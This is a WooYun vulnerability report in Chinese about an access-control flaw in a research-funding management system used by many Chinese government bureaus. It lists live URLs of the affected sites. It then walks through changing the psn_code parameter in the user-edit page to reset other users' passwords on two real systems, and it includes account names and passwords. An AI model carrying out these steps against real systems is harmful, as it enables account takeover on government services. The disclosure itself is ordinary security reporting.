WooYun.org

名称：科研（专项资金项目）管理信息系统
开发公司：爱瑞思软件（深圳）有限公司 http://www.irissz.com/
涉及的用户（列表不全）：
http://203.86.28.246:81/stmsres/ 中山市医疗卫生科研管理信息系统
http://218.64.59.73/stms/login.jsp 江西省科技业务综合管理系统
http://kjgl.gzmed.gov.cn/stmsres/ 广州市卫生局科教业务管理系统
http://pro.zhkgmx.gov.cn/stms/login.jsp 珠海市科技工贸和信息化专项资金管理系统
http://researchnet.org/egrantweb/ 深圳市哲学社会科学规划课题管理系统
http://www.kjxm.wst.hainan.gov.cn/stmsres/ 海南省卫生科教项目管理系统
http://pro.zhkgmx.gov.cn/stms/expert.jsp 珠海市科技专家数据库系统
http://system.szexpert.gov.cn/stias/expertindex.jsp 深圳市科技专家库
http://stias.szsitic.gov.cn/resstias/zxqyindex.html深圳市中小企业国际市场拓展资金管理系统
http://gxnsf.gxsti.net/stms/login.jsp 广西自然科学基金项目管理信息系统
https://kjyw.fskw.gov.cn/stmsres/ 佛山市科技局综合业务管理平台
http://mmstms.gdsti.net/stms/main.jsp 茂名市科技业务管理系统
列表不全，还有一些没有列出来。 看开发公司的案例列表：
http://www.irissz.com/egrant.html

越权：
###先用 http://218.64.59.73/stms/login.jsp 来演示漏洞 （江西省科技业务综合管理系统）
第1步： 注册一个普通用户【注册时需要填写组织机构代码，百度了一个，可以微改使用（L1832212-3）】，登录进去、
我注册的帐号：himan 密码：xiaojin

第2步：来到【系统管理】-->【用户管理】修改用户信息处：
http://218.64.59.73/stms/orgUser.do?action=vEdit&psn_code=34680

我们修改一下psn_code参数试试：
http://218.64.59.73/stms/orgUser.do?action=vEdit&psn_code=34678

越权产生、再看：
http://218.64.59.73/stms/orgUser.do?action=vEdit&psn_code=34677

有密码字段，我们填上密码试试。 这里我把密码都填上123456
提示操作成功：

来登录试试：yxjg6898268 123456

再来用http://203.86.28.246:81/stmsres/ 演示：（中山市医疗卫生科研管理信息系统）
同样先注册用户：
himan 123456 / himan1 xiaojin
先登录：

来到【系统管理】-->【用户管理】修改信息处：
http://203.86.28.246:81/stms/orgUser.do?action=vEdit&psn_code=5903

http://203.86.28.246:81/stms/orgUser.do?action=vEdit&psn_code=5904

修改下密码：
提示操作成功：

himan1/123456登录一下：

其他就不演示了、